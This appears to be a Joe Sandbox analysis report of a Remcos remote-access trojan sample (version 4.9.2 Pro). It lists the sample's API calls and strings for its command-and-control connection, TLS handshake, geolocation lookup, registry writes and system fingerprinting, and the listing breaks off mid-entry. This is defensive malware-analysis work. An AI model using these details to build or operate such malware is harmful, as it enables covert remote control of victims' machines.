Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E92F), ref: 0041CBC0
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CBC3
Part of subcall function 0041CA9E: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E92F), ref: 0041CBD1

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\yaALNupJCH.exe,00000104), ref: 0040E93C

Part of subcall function 00410E85: __EH_prolog.LIBCMT ref: 00410E8A

Strings

Administrator, xrefs: 0040F1D5
PG, xrefs: 0040ED21
SG, xrefs: 0040EAB0
C:\Users\user\Desktop\yaALNupJCH.exe, xrefs: 0040E934, 0040ED5D
Exe, xrefs: 0040EA5D
Remcos Agent initialized, xrefs: 0040EF3D
8SG, xrefs: 0040EE6B
del, xrefs: 0040F21F
PG, xrefs: 0040F0A2
dMG, xrefs: 0040F0F6
PG, xrefs: 0040EC95
PG, xrefs: 0040EEB4
PG, xrefs: 0040F051
C}w, xrefs: 0040EF20
PG, xrefs: 0040E9E4
SG, xrefs: 0040EA53
Access Level: , xrefs: 0040F1ED
Inj, xrefs: 0040EB23, 0040EB3A
license_code.txt, xrefs: 0040E99B
PG, xrefs: 0040F115
PG, xrefs: 0040E9AB
exepath, xrefs: 0040EDE0, 0040EE8E
PG, xrefs: 0040EF84
PSG, xrefs: 0040F172
PG, xrefs: 0040EDFA
licence, xrefs: 0040EED6
8SG, xrefs: 0040EDB3
PG, xrefs: 0040F079
User, xrefs: 0040F1DC
PG, xrefs: 0040ECC9
del, xrefs: 0040F23B, 0040F2BD
Software\, xrefs: 0040EA11
PG, xrefs: 0040F026
PG, xrefs: 0040F0D5
PG, xrefs: 0040F141

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Users\user\Desktop\yaALNupJCH.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$C}w$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
API String ID: 2830904901-1191715453
Opcode ID: eb7774613e4eb10c5603e39b49e72aca94fdbd87039b9a69dc6e88d4ea3bb132
Instruction ID: d8e748011ac261579b04b62acd89da4cc948a8ae52a086a136a565020762d1ab
Opcode Fuzzy Hash: eb7774613e4eb10c5603e39b49e72aca94fdbd87039b9a69dc6e88d4ea3bb132
Instruction Fuzzy Hash: F932E860B043412BDA14B7729C67B6E26994F81748F50483FB9467B2E3EEBC8D45839E

Uniqueness

Uniqueness Score: -1.00%

Function 00414E78 Relevance: 48.1, APIs: 5, Strings: 22, Instructions: 809
sleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414EC9
WSAGetLastError.WS2_32(00000000,00000001), ref: 004150DA
Sleep.KERNEL32(00000000,00000002), ref: 00415A25

Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457

Strings

Connection Error: Unable to create socket, xrefs: 00415138
PG, xrefs: 00414EA2
Connected | , xrefs: 0041519C
C:\Users\user\Desktop\yaALNupJCH.exe, xrefs: 0041530E
NG, xrefs: 00415330
Connection Error: , xrefs: 004150ED
| , xrefs: 00415060, 004151A1
dMG, xrefs: 004153E7
PG, xrefs: 004159EC
hlight, xrefs: 004152E1
NG, xrefs: 00415371
TLS Off, xrefs: 00415033
8SG, xrefs: 0041528E
4.9.2 Pro, xrefs: 00415419
PG, xrefs: 00415276
C}w, xrefs: 004159CB
name, xrefs: 004152B4
Connecting | , xrefs: 00415056
%I64u, xrefs: 00415244
PSG, xrefs: 0041544C
TLS On , xrefs: 00415041
Disconnected, xrefs: 00415995

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Sleep$ErrorLastLocalTime
String ID: | $%I64u$4.9.2 Pro$8SG$C:\Users\user\Desktop\yaALNupJCH.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$C}w$NG$NG$PG$PG$PG
API String ID: 524882891-113149829
Opcode ID: afd943ef5dcc4cc756cdb076416e71ead7d8f035da6ea20701237ae6b59bc3e5
Instruction ID: 0c0af6725c2ee72569da9b24d69e1a2afa1e62434ece525c72468294da20a235
Opcode Fuzzy Hash: afd943ef5dcc4cc756cdb076416e71ead7d8f035da6ea20701237ae6b59bc3e5
Instruction Fuzzy Hash: 22527B31A001155ACB18F732DD96AFEB3759F90348F5041BFE40A761E2EF781E858A9D

Uniqueness

Uniqueness Score: -1.00%

Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,?), ref: 004048E0
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
WSAGetLastError.WS2_32 ref: 00404A21

Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457

Strings

TLS Error 3, xrefs: 004049D8
TLS Authentication Failed, xrefs: 00404999
TLS Error 2, xrefs: 00404955
TLS Error 1, xrefs: 00404937
TLS Handshake... | , xrefs: 00404904
Connection Failed: , xrefs: 00404A43
Connection Refused, xrefs: 00404A76

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
API String ID: 994465650-2151626615
Opcode ID: ab4cb6909e3c6c2de8a63f62b80cba0d09a48fc96966410bdc9691a4cb57bb68
Instruction ID: 1d1f4e3e38f99df0ccdd24eaac06efc89d62f3200a1196d06f059074cb1d02c7
Opcode Fuzzy Hash: ab4cb6909e3c6c2de8a63f62b80cba0d09a48fc96966410bdc9691a4cb57bb68
Instruction Fuzzy Hash: 104107B47407116BC61477BA8D1B52E7A55AB81308B90017FE60266AD3EA79AC108BEF

Uniqueness

Uniqueness Score: -1.00%

Function 0040D982 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DAE8

Strings

\system32, xrefs: 0040D9FC
UserProfile, xrefs: 0040DAA6
ProgramFiles, xrefs: 0040DABC
ProgramData, xrefs: 0040DAAD
Temp, xrefs: 0040D9B4
WinDir, xrefs: 0040D9E9, 0040DA0B, 0040DA5D
\SysWOW64, xrefs: 0040DA4E
AppData, xrefs: 0040DA9F
SystemDrive, xrefs: 0040D9DF

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-425784914
Opcode ID: 08152344a88b1aafa287ee53882f99d057b338c833188ad934ba85c4ac9216bd
Instruction ID: 145e99ee69a128d844c50a4e5757f73a1ea156b369d54702e3bea958445c7b3d
Opcode Fuzzy Hash: 08152344a88b1aafa287ee53882f99d057b338c833188ad934ba85c4ac9216bd
Instruction Fuzzy Hash: 324142716082019AC215FB61DC56CAFB3A8AED075CF10053FB146B20E2FF789D49C65B

Uniqueness

Uniqueness Score: -1.00%

Function 0041B2CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B2F5
InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B30B
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B324
InternetCloseHandle.WININET(00000000), ref: 0041B36A
InternetCloseHandle.WININET(00000000), ref: 0041B36D

Strings

http://geoplugin.net/json.gp, xrefs: 0041B305

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID: http://geoplugin.net/json.gp
API String ID: 3121278467-91888290
Opcode ID: 76ad1f6297f49dd75f66eda75dc814347f90daedd7df2bf0f6010fd8ef171b9d
Instruction ID: 51d5d9e6badc34deb6fc5e13cd0461c56716845dbac29438bce231469f2039f8
Opcode Fuzzy Hash: 76ad1f6297f49dd75f66eda75dc814347f90daedd7df2bf0f6010fd8ef171b9d
Instruction Fuzzy Hash: 221108311053126BD224AB269C89EBF7F9CEF86355F00043EF945A2281DB68DC45C6F6

Uniqueness

Uniqueness Score: -1.00%

Function 0041B211 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041BF05: GetCurrentProcess.KERNEL32(?,?,?,0040D9F8,WinDir,00000000,00000000), ref: 0041BF16

Part of subcall function 004134F4: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413518
Part of subcall function 004134F4: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413535
Part of subcall function 004134F4: RegCloseKey.KERNEL32(?), ref: 00413540

StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B28A

Strings

(32 bit), xrefs: 0041B2BD
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0041B225, 0041B22F, 0041B270
CurrentBuildNumber, xrefs: 0041B26B
ProductName, xrefs: 0041B220
(64 bit), xrefs: 0041B2B6

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue
String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 1866151309-2070987746
Opcode ID: b70d67bc590ebc8f5d6323d6fa3e34c4297352d767c7317703301afde455c94f
Instruction ID: 85ec155db325c3716f7be7651620dee3a3d5c829a50febba6db02ef006b91dd8
Opcode Fuzzy Hash: b70d67bc590ebc8f5d6323d6fa3e34c4297352d767c7317703301afde455c94f
Instruction Fuzzy Hash: 4D11E770A4010516C704B36A8C9BEFF76598B51304F54053BF546B21D2FB7C5D8683EE

Uniqueness

Uniqueness Score: -1.00%

Function 00404CC3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
FindCloseChangeNotification.KERNEL32(?,?,00000000), ref: 00404DDB

Strings

C}w, xrefs: 00404DC7

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
String ID: C}w
API String ID: 2579639479-225694155
Opcode ID: 0f902c50f68177a48589da84d99d87b9834b108c6d20614da67969fb47c64140
Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
Opcode Fuzzy Hash: 0f902c50f68177a48589da84d99d87b9834b108c6d20614da67969fb47c64140
Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666

Uniqueness

Uniqueness Score: -1.00%

Function 00404F51 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415C24,?,00000001), ref: 00404F81
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415C24,?,00000001), ref: 00404FCD
CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0

Strings

KeepAlive | Enabled | Timeout: , xrefs: 00404F94
C}w, xrefs: 00404FE0

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: KeepAlive | Enabled | Timeout: $C}w
API String ID: 2532271599-1405593962
Opcode ID: 082ae36f3936cb6e40208b16190b89ec08c6e4c5d4be21b07eeb4c36054df58b
Instruction ID: 3be0fb6296c169822b6bfad2b003431a84525fea4849727fdd8bc91c5f69ea92
Opcode Fuzzy Hash: 082ae36f3936cb6e40208b16190b89ec08c6e4c5d4be21b07eeb4c36054df58b
Instruction Fuzzy Hash: 79110671800385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA

Uniqueness

Uniqueness Score: -1.00%

Function 0044F29B Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044F2A4
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F2C7

Part of subcall function 00446077: RtlAllocateHeap.NTDLL(00000000,004351DF,?,?,00438787,?,?,00000000,?,?,0040DDB0,004351DF,?,?,?,?), ref: 004460A9

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F2ED
_free.LIBCMT ref: 0044F300
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F30F

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 0188c23d9a42ca701e810b9320793c8bfeb8bdf58a3de3564db1771293670913
Instruction ID: 6f93c96cac939cab9531f5e5a2489491171a956b12200d0629ea11f0b50ef7ae
Opcode Fuzzy Hash: 0188c23d9a42ca701e810b9320793c8bfeb8bdf58a3de3564db1771293670913
Instruction Fuzzy Hash: 6001D472601711BF77211ABA5C8CC7F6A6CEAC6FA6325013BFC04C2205DA698C0591B9

Uniqueness

Uniqueness Score: -1.00%

Function 00448159 Relevance: 7.6, APIs: 5, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,00000000,00000000,0043BBC7,00000000,00000000,?,0043BC4B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044815E
_free.LIBCMT ref: 00448193
_free.LIBCMT ref: 004481BA
SetLastError.KERNEL32(00000000,?,00405103), ref: 004481C7
SetLastError.KERNEL32(00000000,?,00405103), ref: 004481D0

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 73148e45db194749aa813c8d1e9651f1292055391ac483a56b3624eb5748bc14
Instruction ID: 0b380766fe1817187751ec2fb0ad1f4860a95c254106f4947c3de2dc19a13ac7
Opcode Fuzzy Hash: 73148e45db194749aa813c8d1e9651f1292055391ac483a56b3624eb5748bc14
Instruction Fuzzy Hash: F301D1361447006BB612272A6C86A6F316D9BD2775B32052FF909A22A2EE6CCC03816D

Uniqueness

Uniqueness Score: -1.00%

Function 00415A38 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEvent.KERNEL32(?,?), ref: 00415A5D
GetTickCount.KERNEL32 ref: 00415AD4

Strings

!D@, xrefs: 00416FD7
NG, xrefs: 00415A8C

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CountEventTick
String ID: !D@$NG
API String ID: 180926312-2721294649
Opcode ID: a0b38f98c671beb7fc3d87e18fa3f1af28177e2fab2b91f248755b924d0bc7a1
Instruction ID: 4664a4f16019f4c21568267905f705ac892616566a68641603d99fb648fe5e11
Opcode Fuzzy Hash: a0b38f98c671beb7fc3d87e18fa3f1af28177e2fab2b91f248755b924d0bc7a1
Instruction Fuzzy Hash: 2A51B6715082419AC724FB32D852AFF73A5AF90344F50483FF546671E2EF7C5946C68A

Uniqueness

Uniqueness Score: -1.00%

Function 004136BD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004136CC
RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F7A1,004674B8,4.9.2 Pro), ref: 004136F4
RegCloseKey.KERNEL32(?,?,?,0040F7A1,004674B8,4.9.2 Pro), ref: 004136FF

Strings

pth_unenc, xrefs: 004136C1

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc
API String ID: 1818849710-4028850238
Opcode ID: 87a8587fdf61455578c18fadf820c0f2941d90eae7f8086bdc4bef892f8b9eae
Instruction ID: cc028357d89538f4ae3fadff7a052b61de77b90b6085a72f54274e8bffa45260
Opcode Fuzzy Hash: 87a8587fdf61455578c18fadf820c0f2941d90eae7f8086bdc4bef892f8b9eae
Instruction Fuzzy Hash: 51F06272400218FBCB009FA1DC45DEE3B6CEF05751F108566FD09A61A1D7359E14DA94

Uniqueness

Uniqueness Score: -1.00%

Function 0040CFB7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EB56,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040CFC6
GetLastError.KERNEL32 ref: 0040CFD1

Strings

SG, xrefs: 0040CFB7

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID: SG
API String ID: 1925916568-3189917014
Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519

Uniqueness

Uniqueness Score: -1.00%

Function 00404AA1 Relevance: 4.6, APIs: 3, Instructions: 93synchronizationnetworkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: EventObjectSingleWaitsend
String ID:
API String ID: 3963590051-0
Opcode ID: 5fd45b4b11434b0c12dc10d8de83455ac21abd31222456cea956a7955e4b4ad4
Instruction ID: bf343d2d8772227751a31e52b180d9e311d46e55edc4a3b559ef89dc1ff1ac31
Opcode Fuzzy Hash: 5fd45b4b11434b0c12dc10d8de83455ac21abd31222456cea956a7955e4b4ad4
Instruction Fuzzy Hash: 202124B2900119BBCB04BBA1DC95DEE777CEF18314B00452FF515B21E2EA78AA15CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 004134F4 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413518
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413535
RegCloseKey.KERNEL32(?), ref: 00413540

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
Instruction ID: 11ad58ed07fa4a0a265b1ef9ab622cf9d1d79dbf7f3678ccb4777a53df69ef08
Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
Instruction Fuzzy Hash: FF01D676900228FBCF209B95DC08DEF7F7DDB44B51F000166BB09E2140DA749E45DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00413646 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413662
RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041367B
RegCloseKey.KERNEL32(00000000), ref: 00413686

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 98426144924e105c68d43f2c638da1a3b8ba285331bfbd987b3b1c2d06b55679
Instruction ID: 136777831733cc42731b161c89641b3c83b116acaaa4d3a405525fee88e85c23
Opcode Fuzzy Hash: 98426144924e105c68d43f2c638da1a3b8ba285331bfbd987b3b1c2d06b55679
Instruction Fuzzy Hash: A4014B31900229FBCF219F91DC05DEB7F39EF05761F0041A5BE0862261D6358AA9DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0044F31E Relevance: 4.5, APIs: 3, Instructions: 37COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044F322
_free.LIBCMT ref: 0044F35B
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F362

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free_free
String ID:
API String ID: 2716640707-0
Opcode ID: 9ec1d961cb14f12f91aacdaf6413dd81fe3ec32b96427f978c5212ff75952165
Instruction ID: a1d6b4a1e64e919a94679e00097536c2a03edaddbe57f8c032bdc4099cd812e0
Opcode Fuzzy Hash: 9ec1d961cb14f12f91aacdaf6413dd81fe3ec32b96427f978c5212ff75952165
Instruction Fuzzy Hash: 86E06537105A216BB221663A7C49D6B2A19DFC67A972A003BF90486142DE29CD0640ED

Uniqueness

Uniqueness Score: -1.00%

Function 00413497 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004134B7
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004134D5
RegCloseKey.KERNEL32(?), ref: 004134E0

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
Instruction ID: e794e59b5ca6a57b749d61e58330535b6f90d7e0fac61ab044fd0cc5ac3c4881
Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
Instruction Fuzzy Hash: 13F0F976900218FFDF119FA49D05BEA7BBCEB04B11F1040A6BE08E6191D2359A549B94

Uniqueness

Uniqueness Score: -1.00%

Function 0041344D Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C0EA,00466C48), ref: 00413464
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C0EA,00466C48), ref: 00413478
RegCloseKey.KERNEL32(?,?,?,0040C0EA,00466C48), ref: 00413483

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
Instruction ID: e49fa1678814d70b7460577f8c92d0bb3d1ec56b87fc076ee76b734fba8ab665
Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
Instruction Fuzzy Hash: 83E06531801338FB9F208FA29C0DEEB7F6CDF0ABA5B004155BD0CA1111D2258E50E6E4

Uniqueness

Uniqueness Score: -1.00%

Function 004137C5 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 004137D3
RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C0A0,00466C48,00000001,000000AF,004660A4), ref: 004137EE
RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C0A0,00466C48,00000001,000000AF,004660A4), ref: 004137F9

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
Instruction ID: ead8b78bb389cf5df025ceee4aae861e94320b11b9276a5e3b9bfc9d6c17330c
Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
Instruction Fuzzy Hash: 69E06572500318FBDF105F90DC05FEA7F6CDF04B52F104465BF09A6191D2358E14A7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00404B96 Relevance: 4.5, APIs: 3, Instructions: 28synchronizationnetworkCOMMON

Download Yara Rule

APIs

